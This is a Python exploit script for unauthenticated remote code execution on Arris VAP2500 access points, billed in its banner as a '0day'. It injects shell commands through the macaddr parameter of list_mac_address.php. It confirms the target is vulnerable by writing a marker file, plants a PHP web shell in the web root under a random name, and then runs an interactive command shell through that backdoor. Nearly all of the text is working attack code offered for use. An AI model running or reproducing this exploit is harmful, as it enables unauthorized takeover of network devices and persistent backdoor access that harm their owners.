Arris VAP2500 未授权远程代码执行

import logging, os, time, datetime, re,sys import requests import string import random import time import urllib2 from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) from requests import ReadTimeout, ConnectTimeout, HTTPError, Timeout, ConnectionError print ("") from colorama import Fore, Back, Style, init from cStringIO import StringIO from urllib2 import URLError init() if os.name == 'posix': os.system('clear') if os.name == 'nt': os.system('cls') piton = os.path.basename(sys.argv[0]) def banner(): print ''' @---------------------------------------------------------------@ | | | ARRIS - Unauthenticated RCE - 0day | @---------------------------------------------------------------@ ''' if len(sys.argv) < 2: print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <url>\n' print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' http://127.0.0.1\n' sys.exit() banner() print '\n\x20\x20[*] Starting Exploitation '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET host = sys.argv[1] try: testurl = requests.get(host, verify=False, timeout=6.0) except urllib2.HTTPError, errorzio: if errorzio.code == 404: print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET print sys.exit() except URLError, errorziocvaj: if errorziocvaj.reason: print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET print sys.exit() print '\x20\x20[*] Connectivity Test '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET c1 = {"macaddr": "00:00:44:00:00:00;echo '83218ac34c1834c26781fe4bde918ee4'>/var/www/1roksi.txt", "action": "0", "settype": "1"} s1 = requests.post(host+"/list_mac_address.php", data=c1, verify=False, timeout=6.0) lw = requests.get(host+'/1roksi.txt', verify=False) if "83218ac34c1834c26781fe4bde918ee4" in lw.text: print '\x20\x20[*] Target Seems Vulnerable '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET print else: print '\x20\x20[*] Not vulnerable '+'.'*41+Fore.GREEN+'[ERR]'+Fore.RESET sys.exit() if __name__ == '__main__': N = 10 ran = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(N)) sh = str(ran)+".php" lo1={"macaddr": "00:00:44:00:00:00;echo '<?php if($_GET['cmd']) { system($_GET['cmd']); } ?>' > /var/www/"+sh+"", "action": "0", "settype": "1"} send_stage = requests.post(host+"/list_mac_address.php", data=lo1, verify=False) print '\x20\x20[*] Sending Backdoor File '+'.'*39+Fore.GREEN+sh+Fore.RESET time.sleep(2) print '\x20\x20[*] Starting'+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET time.sleep(1) if send_stage.status_code==200: print Style.DIM+Fore.CYAN+'\x20\x20[*] Exploitation Finish - System PWNED\n'+Style.RESET_ALL+Fore.RESET print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to get intercative shell!\n'+Style.RESET_ALL+Fore.RESET raw_input() while True: try: cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) execute = requests.get(host+"/"+sh+"?cmd="+cmd, verify=False) reverse = execute.text print reverse if cmd.strip() == 'exit': break except Exception: break print sys.exit()